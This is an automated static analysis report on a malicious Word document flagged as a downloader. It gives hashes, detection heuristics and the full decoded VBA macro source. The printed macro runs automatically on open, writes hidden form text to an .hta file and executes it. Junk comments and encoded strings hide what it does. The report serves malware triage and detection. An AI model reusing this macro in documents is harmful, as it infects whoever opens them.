Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 17c009d0cbfcf3bd…

MALICIOUS

Office (OOXML)

Size: 79.2 KB
Created: 2021-02-25 07:18:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-03-01
MD5: 339834416d9605c88b39c99d5a8eb3f2
SHA-1: 0e6bf062194065ac1100b14e6cbfb673939eade4
SHA-256: 17c009d0cbfcf3bd83ed06a3ba7edd019d71226cbd44f07e058afe851a225ff7
Risk score: 192

Heuristics (7)

  • ClamAV: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.8f0f0f0fe0f0f0f0-OOXML-9981534-0
  • VBA project inside OOXML [medium, 3 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Matched line in script:
    Interaction.Shell aHDWrx(aFAtzm) & " " & aHX3xw
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    Set aSNVYX = CreateObject("Scripting.FileSystemObject")
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    Matched line in script:
    Sub AutoOpen()
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 4390 bytes
SHA-256: e21e549687f8d23fc37029807c147f76424223b36e4d68557aa8e894014b146b
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "iform"
Attribute VB_Base = "0{7672AD7D-1687-4D5A-8307-B569E7861D19}{BFE90A09-FCC2-44C2-91DE-799856F55802}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "a3dcDL"
Sub AutoOpen()
' Repair complaints ready
' Links freshman ladder patrol budapest
aPR7u
End Sub

Attribute VB_Name = "aqblM"
Function aVFGM()
aVFGM = Array(105, 48, 86, 122, 120, 101, 109, 120, 107, 103, 110, 107, 126, 107, 86, 107, 89, 92, 59, 105, 36, 98, 126, 107)
End Function
Function aFAtzm()
aFAtzm = Array(105, 48, 86, 125, 99, 100, 110, 101, 125, 121, 86, 111, 114, 122, 102, 101, 120, 111, 120)
End Function

Attribute VB_Name = "aMApij"
Sub aSjOb(ak8Dj, aW5Un)
' Norse smear rhinoceros surround tea lathe
' Interdict abler relaxing
Set aSNVYX = CreateObject("Scripting.FileSystemObject")
' Vigilant nitrogen
' Nelly lath palmer indubitable
' Compatible waterproof riband ezra
' Ph
Set a9zpf = aSNVYX.CreateTextFile(ak8Dj)
a9zpf.WriteLine aW5Un
a9zpf.Close
' Straighten louis alibi
' Files
' Designs mysterious carlo
' Zeb thoughts collectables planned
' Cask wan incautious division immigrants neutral sponsorship
' Reveals governance perishable
' Mpeg reaching
' Census review unskilled
' Brick instruments
' Leavings
End Sub
Function av0OD(a9DRHE, ak6Vc)
' Variation blade festivals nowise
' Sallies slack leafy ecological hazy
' Relation feasibility chapman swaziland separates genealogy
If Len(a9DRHE) <> 4 Then av0OD = a9DRHE Xor ak6Vc
End Function
Function aHDWrx(aaK9n7 As Variant)
Dim aIHZL As String
aIHZL = ""
' Dormitory
' Upsetting japanese certificates vom
' Grocery ya operated gregory halo sierra
' Protective pct fleet controversial fame member
' Lint golf communist
' Cinderella show chen
' Scorch lambent imperceptibly toys webshots
' Mow ka complicity
' Checking existent precipitation
' Cached voter attention
' Dragoon burrow entertaining
For apO5ig = 0 To UBound(aaK9n7)
a7KdL = ahatG8(av0OD(aaK9n7(apO5ig), 10))
aIHZL = aIHZL & a7KdL
Next apO5ig
aHDWrx = aIHZL
End Function
Function aPMvL(ahxrls)
alVcW = ""
For a1MV2G = Len(ahxrls) To 1 Step -1
alVcW = alVcW & "" & Mid(ahxrls, a1MV2G, 1)
Next a1MV2G
aPMvL = alVcW
End Function
Function aFmNc()
' Esdras hazards slipshod pill
' Unicorn extraction arrange injury senile
' Organize cant modifies swap stands
' Beverly streams scout hips
aFmNc = aPMvL(iform.txt1.text)
End Function
Function ahatG8(a9DRHE)
' Editorial gateway
' Recession noble nurture observatory healthy wrong batman
' Maldives
If a9DRHE <> 16 Then
ahatG8 = Chr("" & a9DRHE & "")
End If
End Function
Sub aPR7u()
' Goad push gymnastics superficially
' Accountable journeyman bitch boat forgetful produced stag
' Restrict charm uc
' Inferno effort layers interaction fewest
' Entering poet
' Forty-six alloy evacuation insertion prague early baiting
' Lectures
' Be releases
' Emigrant inaccuracy
aW5Un = aFmNc()
' Reasonably scope babylonian honors
' Marred discourteous apartment shame centre
' Amanda partner
' Dietary ezekiel coasting approval
' Sleigh remnants burgher
' Malthus
aHX3xw = aHDWrx(aVFGM)
' Infraction evening magpie
' Solved kodak utrecht licence
' Flashlight oz village inimical rama
' Unattainable canada abbot regulations
Call aSjOb(aHX3xw, aW5Un)
' Shrew ravish someone societies sophist
' Brushing refrigerator hills being
' Transgress feel proffer needle abstemious apply
' Efficacy crime aa highly sundown talisman
Interaction.Shell aHDWrx(aFAtzm) & " " & aHX3xw
' Methodology charger mediocrity ginger gst belated pathology
' Naturals aggression cycles
' Prescription inlaid
' Treble time
' Mh lullaby horny restrict degrade
' Trap grants
' Comedy establishing overnight puzzles belittle
' Stow ampland seth 404
' Lascivious similarly bermuda coherence
' Ht dale
' Kith meteoric nickel scuttle matter-of-fact comeliness anathema
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 31744 bytes
SHA-256: 3e944785c348065bebb8f14633b760bfe2b29f18f329c192226ede5bd1724ebd
Detection:
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).